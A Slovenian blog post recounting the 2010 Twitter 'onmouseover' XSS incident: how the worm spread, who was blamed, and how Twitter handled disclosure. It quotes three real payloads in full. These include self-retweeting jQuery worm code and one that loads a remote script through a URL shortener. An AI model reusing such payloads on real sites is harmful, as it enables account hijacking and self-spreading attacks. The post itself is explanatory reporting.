Twitter je znorel oz. onmouseover napaka

This post is also available in: English

Twitter je v torek ponorel oz. kot je napisala @sparkica, pojavljati so se začeli tviti v klingonščini. Vse to je omogočila varnostna luknja na spletni strani Twitter.com.

Twitter račune so preplavila sporočila s čudnim besedilom  in če ste šli z miško preko tega sporočila, se je samodejno odprla določena stran (spam vsebine, kaj lahko bi lahko bila stran s škodljivo kodo, a na srečo do tega ni prišlo), v večini primerov tudi samodejno  poslan tvit naprej, v najslabšem primeru pa je prišlo še do zaklenitve twitter računa. Uporabniki zaradi tega nimajo okuženih računalnikov in ni prišlo do kraje podatkov.

Primeri “čudnega” tvita

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#123;background:#827;/

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#768;background:#054;/

t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:u002fu002fis.gdu002ffl9A7′)”

Uporaba drugih aplikacij za dostop do twitter računa

Na mojo srečo uporabljam Digsby aplikacijo za upravljanje s twitter računi in grem redkokdaj na samo spletno stran twitter.com, zato me ta napaka ni prizadela, le nekaj čudnih sporočil sem dobila od drugih. Enako je veljalo za ostale, ki so takrat dostopali do svojih twitter računov preko drugih aplikacij ali pa če so dostopali preko mobilne strani m.twitter.com ali pa preko novega twitterja, saj je bil problem le na glavni twitter spletni strani.

Zanimivo je, da kar 78 % vseh uporabnikov dostopa do svojih računov prav preko glavne spletne strani twitter.com, čeprav obstaja veliko število aplikacij, ki so po mojem mnenju še bolj učinkovita izraba twitterja.

XSS napad

Cross-site scripting; v slovenščino bi lahko prevedli kot programiranje preko spletne strani. Gre za izkoriščanje možnosti, da sev rine javascript kodo v obrazec na spletni strani, preko sporočil na IM, email, forumih, rezultatih spletnih iskalnikov …

V tem primeru je bila uporabljen javascript ukaz onmouseover; gre za dejanje, ki je sledilo vaÅ¡i potezi – z miÅ¡ko preko tvita – samodejno odprtje spletne strani, in samodejno odposlan tvit naprej nekomu, ki mu sledimo v twitter-ju.

Kdo je pravi krivec?

Po internetu in medijih je zaokrožila novica, da so priÅ¡li  na sled izvornemu tvitu in uporabniku @zzap. Gre za avstralskega najstnika Pearce Delphina, starega 17 let iz Melbourna, ki se je na svojem twitter računu opisal kot skoraj polnoleten, kurba socialnih medijev in ljubitelj politike .  Po razkritju je dejal: “Nisem imel pojma, da bo Å¡lo to tako daleč.”

 A po mnenju Sophosa si je samo prisvojil zasluge za to in doživel svojih 5 minut slave.  Glede na to, da bi Twitter verjetno takoj zaprl njegov račun, če bi to v resnici naredil, se pridružujem njegovemu menju.  Če pogledamo še malce nazaj v zgodovinoDelpinovih tvitov, se tudi on sprašuje o @matsta  xss napadu.

Ker je twitter račun @matsta ukinjen, lahko sklepamo, da je ta pravi krivec.

Obveščanje ob napadu

Le en dan pred twitter onmouseover napaki sem v prispevku So hekerji napadli vašo spletno stran? opisala, kako so se lotila obeščanja o hekerskem napadu na svojo spletno stran nekatera napadena spletna mesta.

Twitter se je potrudil s takojšnjim obveščanjem o napaki na več straneh in večkrat ( @safety , @spam , status.twitter.com , blog.twitter.com) ter v nekaj urah rešil problem ( pri nadgradnji sistema, so dovolili vnos kode v URL povezavo, ki jo lahko dodamo v tvit). Hkrati je sama twitter skupnost  skrbela za obveščanje in osveščanje med uporabniki.  Na koncu pa je Twitter še podrobneje razložil vse podrobnosti v zvezi s tem XSS napadom na svojem blogu, tako da ni ostalo nobene nejasnosti.